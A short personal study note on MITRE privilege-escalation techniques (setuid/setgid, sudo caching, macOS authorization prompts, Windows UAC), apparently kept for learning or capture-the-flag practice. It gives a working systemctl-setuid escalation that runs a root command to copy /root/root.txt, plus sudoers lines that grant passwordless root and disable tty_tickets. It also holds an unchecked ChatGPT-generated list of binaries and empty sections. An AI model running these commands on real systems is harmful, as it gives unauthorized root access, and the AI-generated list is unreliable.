Elevation Control Abuse

Created: 03.06.2023

Linux & macOS

setuid and setgid

Platforms: macOS, Linux MITRE: https://attack.mitre.org/techniques/T1548/001/

setuid or setgid bits set in UNIX. chmod u+s [file] or chmod 4777 [file] to set the bit. To enable the setgid bit,Β chmod 2775Β andΒ chmod g+sΒ can be used. Look for the files with the bit set: find / -perm +4000 2>/dev/null and find / -perm +2000 2>/dev/null for the segid.

When a user runs an executable file with the setuid bit set, the real user ID (RUID) of the process is set to the user ID of the user who ran the file, while the effective user ID (EUID) is set to the user ID of the file owner. This means that the process runs with the privileges of the file owner while still retaining the identity of the user who executed the file.

One of the files with this bit set is systemctl. This process is used to start services, for example, an apache server: sudo systemctl start apache2. However, if this file is assigned SUID permissions by mistake, it can be used for privilege escalation.

eop=$(mktemp).service # create a temp file with a random unique name and store the name in a eop variable
echo '[Service]
> ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
> [Install]
> WantedBy=multi-user.target' > $eop # write the config for the service into the file. This unit file will be used by the systemctl to run the process specified in the ExecStart variable. 
# ❗️ Do not copy this code in whole, line by line without the > sign, or else you will not get it work
# ❗️ I have added touch $eop but it's not required (it was in my case, cause I had an error)

/bin/systemctl link $eop # This command in Linux creates a symbolic link for the service file specified in the "$eop" environment variable, in the "/etc/systemd/system/" directory, using the systemctl utility. The link created allows the service to be managed with systemctl commands.

/bin/systemctl enable --now $eop # This command in Linux enables and starts the service specified in the "$eop" environment variable, using the systemctl utility. The "enable" option makes the service to start at boot time, while the "--now" option starts the service immediately after the command is executed.

Below is the list generated by ChatGTP (to validate) that shows other executables with this bit set that are potentially useful to the attacker:

/usr/bin/passwd: Used to change user passwords. A vulnerability in this file could allow an attacker to gain root privileges.

/usr/bin/chsh: Used to change a user's default shell. A vulnerability in this file could allow an attacker to gain root privileges.

/usr/bin/chfn: Used to change a user's finger information. A vulnerability in this file could allow an attacker to gain root privileges.

/usr/bin/sudo: Used to run commands as another user, typically root. A vulnerability in this file could allow an attacker to gain root privileges.

/usr/bin/sudoedit: Used to edit files as another user, typically root. A vulnerability in this file could allow an attacker to gain root privileges.

Mitigation: Don’t set this bit on binaries with known shell escape vulnerabilities.

Sudo caching

Platforms: macOS, Linux MITRE: https://attack.mitre.org/techniques/T1548/003/

One can addΒ admin ALL=(ALL) NOPASSWD: ALLΒ to theΒ /etc/sudoersΒ file. Also, malware might monitor /var/db/sudo file for the timestamp and execurte when possible. Also, it’s possible to disable terminal windows isolation, like this: echo \'Defaults !tty_tickets\' >> /etc/sudoers.

AuthorizationExecuteWithPrivileges

Platforms: macOS MITRE: https://attack.mitre.org/techniques/T1548/004/

AuthorizationExecuteWithPrivileges API (macOS). Set the preferences to block all programs not downloaded from AppStore. Basically, it brings a prompt and asks the user to grant the permissions. The trick is to be convincing enought so that the user grants the permissions.

Mitigations: least privilege, proper configuration, defense in-depth, zero trust.

Writeups πŸ“š:

Windows

UAC Abuse

Platforms: Windows MITRE: https://attack.mitre.org/techniques/T1548/002/

Abusing UAC on Windows.

References

Expand… Something here